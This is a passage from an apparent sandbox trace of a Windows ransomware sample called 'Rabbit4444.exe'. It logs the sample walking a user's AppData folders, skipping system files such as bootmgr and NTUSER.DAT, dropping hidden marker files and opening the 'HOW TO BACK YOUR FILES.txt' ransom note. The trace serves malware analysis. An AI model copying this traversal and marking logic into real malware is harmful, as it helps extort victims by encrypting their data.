cAlternateFileName="")) returned 0x102890 [0062.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.202] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.202] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.202] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.202] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x936165c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361c775, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee65379c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.203] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.203] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.203] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.203] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.203] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.203] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee65379c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee65379c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee65379c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.203] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.203] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.203] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9361a05c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd2398935, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9361a05c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0062.203] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0062.203] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0062.203] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0062.216] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0062.216] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x11e2c0 [0062.216] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x121fa8 [0062.216] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd23993e3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9361b3e5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0062.217] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0062.217] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0062.217] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0062.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0062.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x11e380 [0062.217] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122228 [0062.217] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361b3e5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9361b3e5, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0062.217] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.217] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.217] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0062.217] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0062.217] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0062.218] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0062.218] lstrcpyW (in: lpString1=0x130ebdc, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0062.218] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0062.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0062.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x123760 [0062.218] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x1220c8 [0062.218] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93618cd3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239a476, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x93618cd3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0062.218] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0062.218] lstrcpyW (in: lpString1=0x130ebdc, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0062.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0062.218] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123e00 [0062.218] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x122008 [0062.219] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93618cd3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239a476, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x93618cd3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0062.219] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0062.219] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.219] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.220] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.220] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.220] CloseHandle (hObject=0x298) returned 1 [0062.220] CloseHandle (hObject=0x27c) returned 1 [0062.220] GetCurrentThreadId () returned 0xd98 [0062.220] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0062.220] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp" [0062.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123e00 | out: hHeap=0xe0000) returned 1 [0062.220] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0062.220] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp" [0062.220] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\" [0062.220] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0062.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.222] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.224] FlushFileBuffers (hFile=0x27c) returned 1 [0062.225] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.225] CloseHandle (hObject=0x27c) returned 1 [0062.226] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp") returned 86 [0062.226] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.226] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93618cd3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239a476, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0062.226] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.226] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.226] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.226] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.226] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93618cd3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239a476, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.226] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.226] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.226] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.226] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.226] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.226] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee69ff72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee69ff72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.226] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.226] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.226] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee69ff72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee69ff72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.227] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0062.227] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.227] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.228] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.228] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.228] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.228] CloseHandle (hObject=0x298) returned 1 [0062.228] CloseHandle (hObject=0x27c) returned 1 [0062.228] GetCurrentThreadId () returned 0xd98 [0062.228] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0062.228] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory" [0062.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0062.228] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0062.228] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory" [0062.228] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\" [0062.229] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0062.229] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.230] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.232] FlushFileBuffers (hFile=0x27c) returned 1 [0062.233] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.233] CloseHandle (hObject=0x27c) returned 1 [0062.234] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned 93 [0062.234] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.234] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361b3e5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0062.234] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.234] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.234] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.234] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.234] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9361b3e5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361b3e5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.234] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.234] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.234] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.234] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.234] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.234] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee69ff72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee69ff72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee69ff72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.234] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.234] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.234] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, 